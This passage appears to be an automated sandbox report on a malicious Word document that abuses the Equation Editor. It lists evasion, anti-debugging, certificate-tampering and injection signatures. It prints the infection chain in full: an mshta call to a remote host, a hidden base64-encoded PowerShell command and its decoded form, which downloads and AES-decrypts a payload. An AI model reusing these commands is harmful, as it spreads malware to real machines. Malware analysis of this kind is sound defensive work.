Source: C:\Windows\System32\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 185.82.23.166 443

Malware Analysis System Evasion:

barindex
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Found large amount of non-executed APIsShow sources
Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.8 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3192Thread sleep time: -300000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 3252Thread sleep time: -720000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 3252Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3544Thread sleep time: -922337203685477s >= -60s

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXESystem information queried: KernelDebuggerInformation
Checks if the current process is being debuggedShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
Contains functionality to read the PEBShow sources
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_100032DB mov eax, dword ptr fs:[00000030h]9_1_100032DB
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: msxsl.exeBinary or memory string: Program Manager
Source: msxsl.exeBinary or memory string: Shell_TrayWnd
Source: msxsl.exeBinary or memory string: Progman
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\System32\mshta.exe mshta https://zstorage.biz/read.txt & XXXXXX C
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $lw6 = (New-Object System.Net.WebClient).DownloadString('https://zstorage.biz/f111.txt');$ngCmIwY = [Convert]::FromBase64String($lw6);$j1ZSKVED3 = New-Object 'System.Security.Cryptography.AesManaged';$j1ZSKVED3.Mode = [System.Security.Cryptography.CipherMode]::CBC;$j1ZSKVED3.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$j1ZSKVED3.BlockSize = 128;$j1ZSKVED3.KeySize = 256;$j1ZSKVED3.IV = $ngCmIwY[0..15];$j1ZSKVED3.Key = [System.Convert]::FromBase64String('MTY5RjJGMDdFQURGRDUzMDIwNjJCMEY1
Source: C:\Windows\System32\mshta.exeProcess created: Base64 decoded $lw6 = (New-Object System.Net.WebClient).DownloadString('https://zstorage.biz/f111.txt');$ngCmIwY = [Convert]::FromBase64String($lw6);$j1ZSKVED3 = New-Object 'System.Security.Cryptography.AesManaged';$j1ZSKVED3.Mode = [System.Security.Cryptography.CipherMode]::CBC;$j1ZSKVED3.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$j1ZSKVED3.BlockSize = 128;$j1ZSKVED3.KeySize = 256;$j1ZSKVED3.IV = $ngCmIwY[0..15];$j1ZSKVED3.Key = [System.Convert]::FromBase64String('MTY5RjJGMDdFQURGRDUzMDIwNjJCMEY1

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Adds / modifies Windows certificatesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_1000901D SQLBindParameter,9_1_1000901D
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_10009068 SQLBindParameter,9_1_10009068
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_1000909D SQLBindParameter,9_1_1000909D
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_10008F1D SQLBindParameter,SQLBindParameter,9_1_10008F1D
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_10008B47 wcslen,wcscpy,SQLBindParameter,9_1_10008B47
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_10008F87 SQLBindParameter,9_1_10008F87
Source: C:\Windows\System32\regsvr32.exeCode function: 9_1_10008FD1 SQLBindParameter,9_1_10008FD1

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
